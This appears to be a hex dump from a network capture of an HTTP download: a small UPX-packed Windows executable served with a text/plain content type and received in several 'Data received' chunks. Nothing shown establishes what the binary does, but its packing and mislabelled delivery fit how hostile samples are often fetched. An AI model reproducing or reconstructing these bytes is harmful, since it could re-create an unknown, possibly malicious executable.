6f72 6129 0d0a 4c61 7374 2d4d 6f64 6966    ora)..Last-Modif
6965 643a 2053 756e 2c20 3238 204a 756e    ied: Sun, 28 Jun
2032 3030 3920 3136 3a32 323a 3131 2047     2009 16:22:11 G
4d54 0d0a 4554 6167 3a20 2231 3739 3837    MT..ETag: "17987
3763 2d31 6330 302d 3436 6436 6166 3963    7c-1c00-46d6af9c
3135 3263 3022 0d0a 4163 6365 7074 2d52    152c0"..Accept-R
616e 6765 733a 2062 7974 6573 0d0a 436f    anges: bytes..Co
6e74 656e 742d 4c65 6e67 7468 3a20 3731    ntent-Length: 71
3638 0d0a 436f 6e6e 6563 7469 6f6e 3a20    68..Connection: 
636c 6f73 650d 0a43 6f6e 7465 6e74 2d54    close..Content-T
7970 653a 2074 6578 742f 706c 6169 6e0d    ype: text/plain.
0a58 2d50 6164 3a20 6176 6f69 6420 6272    .X-Pad: avoid br
6f77 7365 7220 6275 670d 0a0d 0a4d 5a90    owser bug....MZ.
0003 0000 0004 0000 00ff ff00 00b8 0000    ................
0000 0000 0040 0000 0000 0000 0000 0000    .....@..........
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 00e0 0000 000e 1fba    ................
0e00 b409 cd21 b801 4ccd 2154 6869 7320    .....!..L.!This 
7072 6f67 7261 6d20 6361 6e6e 6f74 2062    program cannot b
6520 7275 6e20 696e 2044 4f53 206d 6f64    e run in DOS mod
652e 0d0d 0a24 0000 0000 0000 0026 0098    e....$.......&..
7b62 61f6 2862 61f6 2862 61f6 280d 7efd    {ba.(ba.(ba.(.~.
2863 61f6 280d 7efc 2878 61f6 28e1 7df8    (ca.(.~.(xa.(.}.
286e 61f6 2862 61f7 285e 61f6 2800 7ee5    (na.(ba.(^a.(.~.
2867 61f6 28a5 67f0 2863 61f6 2864 42e0    (ga.(.g.(ca.(dB.
2860 61f6 2852 6963 6862 61f6 2800 0000    (`a.(Richba.(...
0000 0000 0000 0000 0000 0000 0050 4500    .............PE.
004c 0103 00f6 1d45 4a00 0000 0000 0000    .L.....EJ.......
00e0 000f 010b 0106 0000 2000 0000 1000    .......... .....
0000 9000 00c0 b300 0000 a000 0000 c000    ................
0000 0040 0000 1000 0000 0200 0004 0000    ...@............
0000 0000 0004 0000 0000 0000 0000 d000    ................
0000 1000 0000 0000 0002 0000 0000 0010    ................
0000 1000 0000 0010 0000 1000 0000 0000    ................
0010 0000 0000 0000 0000 0000 0000 c000    ................
0040 0100 0000 0000 0000 0000 0000 0000    .@..............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0055 5058 3000 0000 0000 9000    .....UPX0.......
0000 1000 0000 0000 0000 0400 0000 0000    ................
0000 0000 0000 0000 0080 0000 e055 5058    .............UPX
3100 0000 0000 2000 0000 a000 0000 1600    1..... .........
0000 0400 0000 0000 0000 0000 0000 0000    ................
0040 0000 e055 5058 3200 0000 0000 1000    .@...UPX2.......
0000 c000 0000 0200 0000 1a00 0000 0000    ................
0000 0000 0000 0000 0040 0000 c000 0000    .........@......
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 332e 3033 0055 5058    ........3.03.UPX
210d 0902 0846 457b 5f4c af83 a2e0 9200    !....FE{_L......
00bf 1300 0000 2c00 0000 0000 33ff ffff    ......,.....3...
ff85 d073 0887 df8d 1dc0 f475 c9eb 1d2a    ...s.......u...*
8d38 0f48 f9f7 de8d 357d 7b31 008d 1ef7    .8.H....5}{1....
daff ffff ff0f bddf be97 5e5c b20f afc1    ..........^\....
0fbf f86a fa4f dceb 4146 5b66 03de 23f7    ...j.O..AF[f..#.
0f49 d28d 126f ffed ff81 dbee 6671 31ff    .I...o......fq1.
f35e 8d36 018b f6ff 1508 2040 0007 be17    .^.6...... @....
8ffb fd9f fd26 0866 13f6 4e10 c1f7 f9c1    .....&.f..N.....
ffc5 0f43 c002 b6c0 1437 db7f 3708 dce0    ...C.....7..7...
dce2 dce3 4849 4911 24f7 d98d 1f6c 79fb    ....HII.$....ly.
0d40 b79f                                  .@..
Data received: 
    
1a05 1985 5309 1689 c9b9 eeff ffb3 ff59    ....S..........Y
180b baba c117 a542 12cd 2e2b cc60 03d1    .......B...+.`..
81c2 472b 0000 ffd2 ffff b3ff 6f8c beca    ..G+........o...
5adc cc89 dec1 d3c3 8d01 230f 4cf7 c1d7    Z.........#.L...
8d8d 0adf b683 fd66 bbf2 76f9 4673 46d3    .......f..v.FsF.
95ca de87 258c 1fff ffd9 6fc4 cbdc dc89    ....%.....o.....
d32c dcea 8bf7 dcc9 bf5c 129f 0df7 dfc1    .,.......\......
f09b fd7f b0f2 424e f981 e725 4c2b 7adc    ......BN...%L+z.
e689 f941 007f 2828 2aca 5d77 f987 85ff    ...A..((*.]w....
ffff ff71 743a 1b75 7512 d825 efbb 6c0c    ...qt:.uu..%..l.
a2a0 7775 7db1 4730 194b 0928 e6b9 a054    ..wu}.G0.K.(...T
d140 28ff ff1f d997 4f07 24bf 92d0 7c21    .@(.....O.$...|!
46e2 1ad3 89d6 7c92 71cd a18b 92ff ffff    F.....|.q.......
ffd2 749b 5f2a ebc5 85eb c83c c908 1e55    ..t._*.....<...U
f2f4 052a 451b 2ffe 0e8f 39a3 19a7 3184    ...*E./...9...1.
6dff ffff ffb4 d519 d4f1 c652 d5d7 4f92    m..........R..O.
e547 9fea 37a7 9b51 e370 3402 b1e3 54ce    .G..7..Q.p4...T.
206a fdab 52ff ffff ffb2 3594 019c 1edd     j..R.....5.....
de04 5bda 529c 158d fa55 5009 63a7 c429    ..[.R....UP.c..)
b542 c811 4e59 b108 5eff 0ffb ff67 18dc    .B..NY..^....g..
deb1 7d18 0e81 eeea cd1e 8738 0642 a17e    ..}........8.B.~
bf1c 984d 95ff ffff ff34 fcd4 13a1 e73d    ...M.....4.....=
b671 ab77 0cd9 5d81 28ff 6e2d 4323 3693    .q.w..].(.n-C#6.
7428 3bb4 8347 aa4d c4fd ffff ff1a 1139    t(;..G.M.......9
65cf faec 3d46 3262 6514 ebbc ae6b 8c65    e...=F2be....k.e
d31d e3b3 4217 f701 faa7 7cfe ffff 8707    ....B.....|.....
554d 3246 75e5 a675 b2a7 624f c337 fba8    UM2Fu..u..bO.7..
ad4e 058e aaf9 80a0 ff61 ff43 bc77 c312    .N.......a.C.w..
7747 e5b6 7fdf 0b68 8689 6ebe 8f00 3b87    wG.....h..n...;.
e427 07f7 02ff 7f84 fde9 9ad0 49e6 001f    .'..........I...
8ff8 7043 f7a3 cd24 3adf 39fb 79f2 3fec    ..pC...$:.9.y.?.
ff24 2bf1 2f48 e181 e26e 7791 67e5 8cac    .$+./H...nw.g...
072e d8d2 ceff ffff 51f1 8ddd 1276 7e15    ........Q....v~.
a2bc 298c 4c06 90ae 63ec 1d0e 7c83 be9c    ..).L...c...|...
ffff ffff fb27 2532 0315 c882 a920 ee80    .....'%2..... ..
4052 c59a 1d44 3f5a c1c0 3584 a7d4 2423    @R...D?Z..5...$#
dc60 ce85 ffff ffff ae82 824e f244 b52d    .`.........N.D.-
1417 8ab5 830a 4543 3665 c1b7 09df c2fe    ......EC6e......
508a 0ca4 14ba c7d0 e3ff b7ff 13b4 bd82    P...............
fdb9 fd5b 6b42 2e3c bf42 27c4 cbd2 78f5    ...[kB.<.B'...x.
c812 1e64 ffff ff7f 1ec1 0dc5 d9b4 e2ac    ...d............
ca6f 7fa7 3fc2 326e b1f0 c9d8 3864 f949    .o..?.2n....8d.I
40a0 470b 50c1 ffff ffff 853d c76f cf9b    @.G.P......=.o..
1665 a0f0 3461 9f52 64c2 1e92 82b8 91c6    .e..4a.Rd.......
e8ba 787c a9a4 d05b 0894 ffff ffff 881e    ..x|...[........
fd8e 22f1 e2fb 503f da66 1f40 0390 ca50    .."...P?.f.@...P
df41 d1fc cb0d 5c54 47c0 01cb 9601 ffff    .A....\TG.......
ffff e0ec f12e 3883 dc59 35a8 7b66 dd2f    ......8..Y5.{f./
2745 6949 79ab 31f5 3b65 ee55 d46c 2f9f    'EiIy.1.;e.U.l/.
2279 ffff ffff faad 3e86 c226 6ffb 4aba    "y......>..&o.J.
23f4 35a0 acb7 05a8 f8e9 c729 75b1 a178    #.5........)u..x
60ef 257d b998 3fb2 ffff 88c9 5943 386a    `.%}..?.....YC8j
870f 0600 f29d f3a3 894b 417f 30f2 506b    .........KA.0.Pk
ffff ffff ed75 6067 1ec0 ebac 4a6a 2036    .....u`g....Jj 6
69dd a725 c957 c864 5541 ee37 fd1a 2384    i..%.W.dUA.7..#.
4992 dcd4 ffff ffff 729a dee8 4578 f187    I.......r...Ex..
590c 11f4 2bae f691 6c56 a084 73b0 0f36    Y...+...lV..s..6
c095 6412 3056 19e9 ffff ffff 2f64 f6a9    ..d.0V....../d..
42e5 8e0f 3e4d ab2d d24d b097 08d0 4b50    B...>M.-.M....KP
ea5c 5da4 dd6c e7f7 6b5f c71c c2ff ffff    .\]..l..k_......
3899 a2e5 f551 d28f ca2c 0aa7 64de 09e3    8....Q...,..d...
f9f3 2330 7840 f57c 244b 18ff ffff ff54    ..#0x@.|$K.....T
29d1 2bc4 71a2 f75e 39cd 55d8 8b5a 98f4    ).+.q..^9.U..Z..
6403 06f6 51a4 bb83 3707 a34b 6194 ff85    d...Q...7..Ka...
ffff 70e5 e532 593d 0bc7 463d d845 51e0    ..p..2Y=..F=.EQ.
1b8b 9116 68d5 1080 93f0 a0b9 ffff ffff    ....h...........
35dc d1ce 13ce d4ae 0851 5d4b ae9a 5865    5........Q]K..Xe
26c4 55cd 27cd b53a c006 dcca 10c8 3f8a    &.U.'..:......?.
f6ff ffff 50b4 53b0 3ce0 7966 283f 8f26    ....P.S.<.yf(?.&
e4f6 34df 27e4 dc73 1082 b94a 8d78 f4c6    ..4.'..s...J.x..
deff ffff fff5 4e54 679d f049 27fa 28f4    ......NTg..I'.(.
46c9 872c f23c e208 580b 81de 37f5 3059    F..,.<..X...7.0Y
8c69 3479 ffff ffff 68ef 68ae f5fc 1a4e    .i4y....h.h....N
4e1f 51c2 62c5 5858 e4c4 9189 0ed8 8105    N.Q.b.XX........
64e1 59fe 742e 0a46 ffff ffb0 3c27 7d0b    d.Y.t..F....<'}.
1cc4 1177 372b 22dc d5d2 0a33 3a12 afb0    ...w7+"....3:...
c802 b934 ffff ffff 4392 7409 bae1 116e    ...4....C.t....n
4e01 2906 2de4 0932 7ab6 d698 bd45 b150    N.).-..2z....E.P
7186 98ba 6930 4300 ffff ffff 6e10 eb39    q...i0C.....n..9
2bd3 73ad 90a3 eef2 3961 e679 394b dbad    +.s.....9a.y9K..
3349 fbb5 5190 16eb 01bb 0b0d dffe ffff    3I..Q...........
d0d3 54ac 6fe0 bf95 43fb d5f7 59a8 1013    ..T.o...C...Y...
7138 9ab0 8809 ca33 4b90 45e9 ffff ffff    q8.....3K.E.....
b012 005d 56e4 1955 90a7 199b 30cf 15a1    ...]V..U....0...
7319 a611 785b f78b 6a2c 5468 9233 59c9    s...x[..j,Th.3Y.
ffff ffff ded6 5076 8a49 7f02 fa71 6bd7    ......Pv.I...qk.
f404 3f38 b695 e72d 51b3 7efa d198 118d    ..?8...-Q.~.....
a345 02d0 ffff 4bff a079 e1ba 39a7 a983    .E....K..y..9...
70d3 2068 4dd6 dcb7 1e20 6e66 c0f5 21d8    p. hM.... nf..!.
4490 ffff ffff 4e83 e5a7 b6f7 4da6 07e5    D.....N.....M...
aa38 82d5 add4 0339 8174 4941 c3cf 7960    .8.....9.tIA..y`
f4e5 7fae                                  ....
Data received: 
    
45d8 ffff ffff 4a51 1e62 2345 fb28 cb18    E.....JQ.b#E.(..
b368 f0c5 56f4 d674 a16c 9dd5 12e1 7054    .h..V..t.l....pT
03a7 ec68 cded ffff ffff 4236 499f 62e1    ...h......B6I.b.
b763 2f61 56d0 523b 3a5a 10f4 7e6e 63d0    .c/aV.R;:Z..~nc.
5a1a a072 eb2a 7425 9116 dff8 ffff 81ec    Z..r.*t%........
fcf8 9767 dcb8 5cae 1e57 eb95 fb7d 533e    ...g..\..W...}S>
f3f2 1ad7 0441 93aa feff ffff 268a 0ab5    .....A......&...
b503 81c9 4cfb aaa8 a260 fe7c 44b9 fe9b    ....L....`.|D...
d412 a3eb 2eba 0345 dd84 cbff ffff 1709    .......E........
eeb1 e0f7 4fba d041 f5f8 373a ff6c b7a4    ....O..A..7:.l..
25bf 0b8e f408 b22b 9455 f1ff 7fe9 a69c    %......+.U......
c5f3 b0e8 407e ab7a 43b5 bc65 e6a5 f7f0    ....@~.zC..e....
60c2 9baf 6ebc c0bf 4280 7632 3b6b eaa3    `...n...B.v2;k..
2931 0c93 10ab ebff ffff 1786 dde8 3767    )1............7g
e8b0 e278 827c 4800 4d21 555d aab3 d027    ...x.|H.M!U]...'
156c 5f56 e1f8 ffff ffff 060b 84c9 17ea    .l_V............
cb6a 90ff fd08 797f 17ee 4ee8 5b8c 0688    .j....y...N.[...
4492 12db a22b 6517 e8a6 5fe0 ffff 1997    D....+e..._.....
031f e8c1 d37a 249d 7508 314d e990 af90    .....z$.u.1M....
646e fbb9 1c69 ffff ffff dbe7 d67e 2ead    dn...i.......~..
5f0b b8a8 43f0 d941 8f35 f876 0e32 14c4    _...C..A.5.v.2..
fe49 8330 da14 0c49 49b8 ffff ffff fedb    .I.0...II.......
8ff9 377a 9366 66f4 4fc8 c4ce a955 24dc    ..7z.ff.O....U$.
6d38 73b6 4e85 a5c4 4ea4 5552 b5c4 ffff    m8s.N...N.UR....
ffed 9abf 03c5 5ba4 82a4 682b 2f18 d182    ......[...h+/...
0e78 4e7e 8332 2b13 f441 3df9 6e1a edc6    .xN~.2+..A=.n...
ffff 5625 2ef6 32c1 78a0 8990 08df f9fc    ..V%..2.x.......
6d28 0bda 8ddb 00fb ffff ffff ae01 456e    m(............En
ce9f 82e9 ff74 36b5 2ec7 8bc3 7343 306c    .....t6.....sC0l
6840 6e1c 35de 1269 b1b7 cc34 f1ff ffff    h@n.5..i...4....
322d 5896 a42b 93ec ce6e 925d 7a91 7814    2-X..+...n.]z.x.
5cb4 6871 80b1 7367 90cd 9f20 ffff ffbf    \.hq..sg... ....
7f43 0739 c665 a6b1 9f1f 6c34 fdc3 8b2d    .C.9.e....l4...-
1c43 85f8 562b df18 8c10 0eba ab97 ffff    .C..V+..........
ffff 0f60 6a53 18a7 6ede e72f b2a4 6d37    ...`jS..n../..m7
5a66 d346 bc0f 19fc 6aad 37b0 6f3d 6ee7    Zf.F....j.7.o=n.
f329 ffff dffe 1058 9061 d112 d0d0 9928    .).....X.a.....(
0dd9 da47 3ccb f8f3 83eb febf 8100 1988    ...G<...........
07a1 05fe ffff 0afa 764c 6ea1 0ba2 08d9    ........vLn.....
3be6 5842 5a54 7816 a767 cc44 3290 f6ff    ;.XBZTx..g.D2...
ff0b d3a9 5cd6 42ec 7d36 ec07 ef54 f140    ....\.B.}6...T.@
d283 7982 9482 c9a3 cbff 4b34 feaf 61d6    ..y.......K4..a.
0a79 55be 5161 3c52 6340 c03f 09f5 c25f    .yU.Qa<Rc@.?..._
e0ff 1346 fb3f 2390 0b26 7403 e0ac 4d81    ...F.?#..&t...M.
06e3 2f43 8bff ff17 feec 4b8e e593 3447    ../C......K...4G
099b 8843 5338 ddda fda8 1600 ab9a 6b63    ...CS8........kc
9d3e f1ff ffff 9a1f 16fc 2337 1de0 161a    .>........#7....
c20a a452 1dbf 355e 23b5 f01a 63a8 0dc0    ...R..5^#...c...
906f feff d6bf 91d6 774a 12a4 3195 d842    .o......wJ..1..B
0284 aea2 aab2 4a80 b9aa f17d 54ff ff3f    ......J....}T..?
0c2f 9162 b8b7 20db 675e 03bf 997f 2429    ./.b.. .g^....$)
681b 7d83 4b56 ff1f f6ff 671c b03e 9850    h.}.KV....g..>.P
131e af76 a68c 27f5 527a f88b 2736 a1bc    ...v..'.Rz..'6..
d6e4 c15f faff eded a155 e79e 2dfd d2f1    ..._.....U..-...
1e2c 865d b764 dbd2 d30e 17fe 1180 878f    .,.].d..........
7fc3 a3fe 06e4 cbc7 ffff ffff 79ad e1e1    ............y...
88f3 1ad2 01c0 50da bedf f766 0c90 2825    ......P....f..(%
0e22 32ea b9a3 82fe b22f a19b ffff ffff    ."2....../......
334e d6d0 252d 323e be95 6d9c 501d 9b07    3N..%-2>..m.P...
b114 917c 6acf 9303 cbbe d106 2baf c333    ...|j.......+..3
dfe2 ffff d989 986d 3223 5248 b5ae 745c    .......m2#RH..t\
d798 4f5e b2c5 44bf 80c5 17b6 fdff bff4    ..O^..D.........
aaa3 0079 1eee 732f dadb 4249 f71b 7f4d    ...y..s/..BI...M
65fd 95a2 ac0b 99c4 ffff ff6f 0200 ea4c    e..........o...L
50cc 353a f0f8 6aa3 1321 3582 530c 3564    P.5:..j..!5.S.5d
a017 e605 df02 457c ffff ffff 8a2c 260b    ......E|.....,&.
77ab a724 4da2 f6e7 93c0 947d 072a 9b0f    w..$M......}.*..
379a f1e6 a71a 203d f2f7 b6e4 ffff c6ff    7..... =........
a984 f09a ee2c 5ab9 76c1 3473 a43e bdee    .....,Z.v.4s.>..
3bf9 e3ae 3386 7178 ee8e ff17 faff 3070    ;...3.qx......0p
355f 7502 a73e 3149 2b10 4c71 e2a8 c1aa    5_u..>1I+.Lq....
c184 f853 f714 ffff ffff 4947 e737 91a9    ...S......IG.7..
ccf6 608f 6948 a298 689f c013 4bc4 b3e6    ..`.iH..h...K...
1407 cecd c863 f90e d69a ffed ffff f7df    .....c..........
5419 4f59 cf99 95ab 9841 37f1 6cf6 8286    T.OY.....A7.l...
9b68 aa7d 3433 7459 2ff7 05fe ffff db80    .h.}43tY/.......
7a1d 27bd 1140 d7ff 0d84 7447 ecb1 70d9    z.'..@....tG..p.
b6c7 ccf4 dc1a f8ff ffff 2bab a621 f6b3    ..........+..!..
6321 910b 153d a549 007b b316 c493 7d63    c!...=.I.{....}c
b4fb fad6 bce6 11f8 ffff 5f5f 2e61 6fc5    ..........__.ao.
ef3d f14f 310b 24b7 dc53 8a8e a199 57f2    .=.O1.$..S....W.
b74e 5d2e 3fff ffff 37d9 9f00 58e5 1014    .N].?...7...X...
7176 63c0 bc17 86d5 a113 d98e f358 9cfe    qvc..........X..
7323 2e00 2ff1 ff85 493a 6590 e868 85d1    s#../...I:e..h..
2e09 5b3b 56ea d79e f7eb f07f 81ff 6473    ..[;V.........ds
22a0 e1d9 4dfe 69a6 308e 7715 444e ef96    "...M.i.0.w.DN..
36f7 7ffb 6f2c 5e14 8018 0621 c28d fea8    6...o,^....!....
6dd1 9592 c480 621b 0b34 58e0 fa24 74a6    m.....b..4X..$t.
347e c9be ffff ffa5 cc78 ac83 230d c79d    4~.......x..#...
094c 2a8c 825b 1059 77f1 6d24 a94b beba    .L*..[.Yw.m$.K..
d625 8dbe f5ff 5344 c158 971d 68d8 c22e    .%....SD.X..h...
edae def9                                  ....
Data received: 
    
924e 1636 cea1 ffff d93f f811 0a20 4317    .N.6.....?... C.
abee bbf4 1943 e8e6 c7d7 f1ff 88c8 078d    .....C..........
3df0 f44d 9913 d70f 8bff ff7f 47d8 ba05    =..M........G...
3dad 7b90 0fa3 d7dc c0f7 d30f abcb dce3    =.{.............
bfb1 b79b f9b4 ffff cbe8 19fd 5703 d9f7    ............W...
d75a bf2c d43c 6c0f 48cb 6623 ca3b fcff    .Z.,.<l.H.f#.;..
ff0b 4bec 3941 5742 4f5f 81df 7d3c c4d8    ..K.9AWBO_..}<..
ba3c d211 1b0f b3cb 0fad 7fe1 bf54 3612    .<...........T6.
4aa6 7a0f bdca dc64 68b4 d76d 4f81 e8b7    J.z....dh..mO...
ffff f796 3578 9df5 f55a dcdc bf2e 18fd    ....5x...Z......
02c1 f951 81d9 3eaf 08c6 bbfd 5f30 c2c1    ...Q..>....._0..
d767 fdfc 81c0 d401 650f 8987 886f 5f68    .g......e....o_h
fff7 d1b9 ea64 5289 2579 3eb0 5176 6dcb    .....dR.%y>.Qvm.
8d13 5a15 b8fd 81fa 3ca1 da4f 2c4f bfa5    ..Z.....<..O,O..
4ad6 76fb df07 dc8b f084 f57a 0b8d 3a25    J.v........z..:%
9e33 c1a3 e36d 73ff ff0f 45dc 81c1 4027    .3...ms...E...@'
2952 81f1 eacc 9f51 a349 f528 fddf 6eff    )R.....Q.I.(..n.
6adc c5ba cabc f04a 2703 41b4 459e bbbe    j......J'.A.E...
8d15 d116 d3f0 5bdc e8bf 1c47 0faf cbfd    ......[....G....
fff7 0345 4259 8684 f67f 7bf7 d190 6613    ...EBY....{...f.
3281 c6fb 0384 84c8 7516 8d0d d18c d794    2.......u.......
cf5b f7ff f6d3 7507 668d 39f2 dce2 0f4b    .[....u.f.9....K
dcf2 e927 a348 43cb ff85 6da3 5f81 f778    ...'.HC...m._..x
4727 ed81 d71c 8d58 5a0f ffed 42dd 8305    G'.....XZ...B...
19dc 98cf fc15 f9dc db8d 1a42 8d1d eaef    ...........B....
bef0 2c16 714a 30ca c1cb df05 33f9 f50f    ..,.qJ0.....3...
4efd 8d45 61ab d86c 188a f536 dbe0 85bf    N..Ea..l...6....
2b25 de3b d27f 262f 4e2c db5b ff01 7fa1    +%.;..&/N,.[....
fc7f bfb2 63c2 aabf 7ecb c244 33ff 36c8    ....c...~..D3.6.
36e1 c0c1 ffbb f025 b694 0260 1cdc ecdc    6......%...`....
ee50 dcc3 09cb dbb7 77f7 da01 82a7 f3db    .P......w.......
b605 80c1 8f12 ff6f 5f7e 0187 d266 ba6f    .......o_~...f.o
6203 3bca 6603 db4b 4b83 c004 c1b6 6fed    b.;.f..KK.....o.
ffdb 030f 4dff 3bc6 0f8c 29ff 0048 a60f    ....M.;...)..H..
4ac9 40d9 ffff dfde 0149 18fb 0f00 7d13    J.@......I....}.
a1a5 a77e cf6b f8b0 a47f 97eb 9d8c 8c7c    ...~.k.........|
14df feff ff14 86ef 3387 3bfe 8bfe 001f    ........3.;.....
6f45 32d1 14fc 1405 5418 d2e3 2b40 72a3    oE2.....T...+@r.
f0e5 d65e f8eb 1400 1d00 8998 ffdf 0f04    ...^............
cf00 ffcd 56fe 3ffd ffff 9700 f413 ffef    ....V.?.........
7a23 ba97 d57b 5754 ffef feff 9747 e4a7    z#...{WT.....G..
ed98 9b71 ae60 039b 74e3 cf1b 9acc 09aa    ...q.`..t.......
7413 74a5 f374 a4e4 fbff 5bb4 7401 7974    t.t..t....[.t.yt
badc fc39 00d0 008f fb75 c7ac 953b c2ff    ...9.....u...;..
ff7f 9393 919c 978a 9f93 be97 aa96 8d8b    ................
acac 0028 7d3b efaf 989c 173f 21cf b71b    ...(};.....?!...
8d90 8c9a af75 2972 bafc ff46 fbff af74    .....u)r...F...t
a2e8 ac74 8ae0 fc0d a918 4a8d 5aa2 eb73    ...t......J.Z..s
8509 fcae fdff effe c3fc 85b0 727c 3b9f    ............r|;.
d408 72b3 db04 ae95 bfb0 a800 aa14 7268    ..r...........rh
8cfe ddee 1fbf 13ad a9ac a917 6fa2 7e39    ............o.~9
ec06 478d 280d eedb eeed 5ba1 a603 3c17    ..G.(.....[...<.
e5cb 1874 33f4 747e 571b f57f f7e1 777f    ...t3.t~W.....w.
5f2b 7e47 0bf9 cd3f 3ccc 4000 fbdb 9c00    _+~G...?<.@.....
bffd df6f ac77 df33 17c4 2b63 a709 3cfe    ...o.w.3..+c..<.
8acb 1b9b 7000 a8fc bc7d e1db 89c4 daff    ....p....}......
7581 cb4c f7c4 388c d396 949a 7ffb 562f    u..L..8.......V/
2389 b099 638f a996 9bc1 9193 9eab 008b    #...c...........
77ed dfb6 0b8b 049e ef77 ba1b 6c7d 4160    w........w..l}A`
5b8c fccc 97ff b7ed 0014 daa3 2cee 9a9a    [...........,...
0098 8a9e 94b9 97a9 97ab 01fc b72f b78a    ............./..
2cab 03f4 97ff 7f26 96ff a900 2f95 c097    ,......&..../...
7db9 fd3e 7f01 89d3 1068 e0dc 03c0 0089    }..>.....h......
afdf ea77 bf1b aa13 7361 074f f148 aaf9    ...w....sa.O.H..
a9a8 e0ab 748b 1783 b7b7 ffa9 0c5c a1a0    ....t........\..
a8fd 84f3 bb7c 84eb 7cfa 74b5 13ff eddd    .....|..|.t.....
7fef aafc 8ceb 75b4 ef1b 74b4 f8d4 080d    ......u...t.....
557c 3cd8 b58a 22ff 2f74 e1a1 a195 cf9b    U|<..."./t......
936e 979a b79f 9197 909c 8a93 97f6 cbad    .n..............
f0b9 9a8b b276 8801 aa3c eb76 fbdc 5ab6    .....v...<.v..Z.
dbdf f074 4a7f 17fd cbdb 7d81 efff 527c    ...tJ.....}...R|
c1c1 a7b7 d1db 178c f3fc e3dc 28aa 207a    ............(. z
46fc 07f4 fff6 7f08 6c74 a9f0 fceb db75    F.......lt.....u
c17a 76fb 7405 15fc fcc3 dc7c c0ff 6ffc    .zv.t......|..o.
ffbf 5b09 b8fd 7f8b f575 f8f0 4510 e0ad    ..[......u..E...
af15 f674 f0fd d1be bfad 7ae1 ffdd aeac    ...t......z.....
63a5 77fd 7c3d fc7c 38fb 152c 7ca0 1462    c.w.|=.|8..,|..b
a0ed ff86 1714 7469 606b 7b2d 8bc7 7520    ......ti`k{-..u 
d4a1 ccfc 28cb ff7f a9f6 c6fd 8bd5 c91c    ....(...........
16f7 2e17 728d f7af 9952 af3f 17f3 2ef1    ....r....R.?....
aeff c3fd a68a f37f 1e00 f0b9 30fd f5fe    ............0...
381d 1ae1 42e1 370f fb14 30a2 7694 15a9    8...B.7...0.v...
f91f e8fe bf30 0df4 95fd a70a bcd8 7f8c    .....0..........
fdbf bf07 dfbb fd08 5f80 3e1f fcad 4baf    ........_.>...K.
018c f7a8 8713 a525 bde1 856d f788 d714    .......%...m....
2c9b 5e6f 0075 a8f7 2516 bebd cfcc c4a2    ,.^o.u..%.......
eff9 ad70 c043 fba8 b7ee b6f1 db93 75bf    ...p.C........u.
d4c0 02a7 e817 8ce3 ff15 ff0b ffbb 0b1b    ................
e774 35fd b1d7 ae71 bfe3 35af 70bf e072    .t5....q..5.p..r
9ad7 c525 f8db b6c0 76a3 5776 5fe7 121c    ...%....v.Wv_...
70bb dbec 9e0b ff2f 5d11 b0ae 52af 3c9f    p....../]...R.<.
7484 dbdb                                  t...
Data received: 
    
748c dbd3 88db 5ff8 f6ff d79f 75e0 74b0    t....._.....u.t.
fc47 4686 c961 8ffb a895 df9e 143e 1bfb    .GF..a.......>..
ff0b ffff fc91 f874 2cfc 30cc 1574 2d3e    .......t,.0..t->
15fa fda9 cb16 d432 7417 3e1a fbfd fbb7    .......2t.>.....
72fb d174 2efd 2f18 752e 26a9 fbcd 15d4    r..t../.u.&.....
22d3 3e7e 2bfc 7fc8 62b0 8a3a a176 e076    ".>~+...b..:.v.v
b1fb 9e44 c616 f91d 5b9e 4059 d0ad 46ff    ...D....[.@Y..F.
72c8 08ab 0610 2454 2029 a8aa ca42 010f    r.....$T )...B..
ff97 6708 9810 0147 6574 5072 6f63 4164    ..g....GetProcAd
8ffd 7ff9 6472 6573 734c 6f61 644c 6962    ....dressLoadLib
7261 7279 411d 5665 72ff f3ff f673 696f    raryA.Ver....sio
6e19 4372 6561 7465 4576 656e 746c 6f62    n.CreateEventlob
616c 416c d6fe 8f6d 0663 264d 6f64 756c    alAl...m.c&Modul
6548 616e 6405 1e7f 3bb6 4d46 3265 1d53    eHand...;.MF2e.S
744f 7475 7049 6e66 df0e f6bb 6f1c 6c73    tOtupInf....o.ls
7472 6370 5f4c 610d 4572 726f f636 f791    trcp_La.Erro.6..
7243 6f6d 6d43 816e 458c 769a 2dd8 6363    rCommC.nE.v.-.cc
b1a5 4887 d8ad b56e 2870 06a8 6d44 4362    ..H....n(p..mDCb
ffc3 fe2d 256b 4f62 6a65 6374 2353 6f6c    ...-%kObject#Sol
6964 4272 75d7 fe34 db73 683e af34 5f61    idBru..4.sh>.4_a
636d a3cf fdda b67b 5f65 7869 2a6d 6571    cm.....{_exi*meq
6fd4 1864 6aed 69b6 bf2a 745f 6664 6976    o..dj.i..*t_fdiv
2fba 5853 5a86 bb1b b646 5975 1a44 6973    /.XSZ....FYu.Dis
7263 684d 28b3 5b6b df61 679f 45a9 14a1    rchM(.[k.ag.E...
6f67 bb39 c26b 686d 1b52 807b 5045 c87f    og.9.khm.R.{PE..
